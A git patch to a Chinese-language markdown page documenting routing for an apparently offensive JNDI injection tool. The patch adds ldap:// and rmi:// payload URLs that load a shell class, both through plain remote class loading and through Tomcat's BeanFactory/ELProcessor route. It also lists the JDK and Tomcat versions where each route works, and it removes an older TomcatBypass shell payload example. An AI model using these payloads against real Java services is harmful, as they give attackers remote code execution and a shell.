From b22a0291ab6636eff19b3185fae57e9cf3c69563 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=82=81?= <75202638+qi4L@users.noreply.github.com> Date: Sat, 28 Mar 2026 11:49:21 +0800 Subject: [PATCH] =?UTF-8?q?Updated=201=20=E3=80=81JNDI=20Routing=20(markdo?= =?UTF-8?q?wn)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 1-、JNDI-Routing.md | 20 +++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) diff --git a/1-、JNDI-Routing.md b/1-、JNDI-Routing.md index 8b3bcc4..86601e1 100644 --- a/1-、JNDI-Routing.md +++ b/1-、JNDI-Routing.md @@ -1,11 +1,5 @@ JNDI injection payload 的**Gadget与Payload不区分大小写**。 -``` -对于 JNDI injection payload 是这一处的说明 ----+ - | -ldap://127.0.0.1:1389/TomcatBypass <----------+ /M-EX-MS-TSMSFromJMXS/shell/LXB3IDEyMzQ1Ng== -``` - # 远程类加载 ## Basic @@ -13,6 +7,12 @@ ldap://127.0.0.1:1389/TomcatBypass <----------+ /M-EX-MS-TSMSFromJMXS/shell/LXB Oracle JDK 11.0.1, 8u191, 7u201, and 6u211 及以后的版本,为了限制LDAP协议的JNDI利用,将系统属性 com.sun.jndi.ldap.object.trustURLCodebase 的默认值设置为 false ,即默认不允许 LDAP 从远程地址加载 objectfactory 类。 +自定义类加载例子 +``` +ldap://127.0.0.1:1389/basic/M-LF-shell.class +rmi://127.0.0.1:1099/basic/M-LF-shell.class +``` + # 本地工厂类加载 org.apache.naming.factory.BeanFactory @@ -25,7 +25,13 @@ org.apache.naming.factory.BeanFactory 9.0.63后forceString选项已作为安全强化措施删除。 tomcat-embed-core || tomcat-catalina <= 9.0.62 (Spring Boot Starter Tomcat <= 2.6.7)可用。 -+- + +自定义类加载例子 +``` +ldap://127.0.0.1:1389/elprocessor/M-LF-shell.class +rmi://127.0.0.1:1099/elprocessor/M-LF-shell.class +``` + ## Deserialization 向 javaSerializedData 属性中写入 gadget 的序列化数据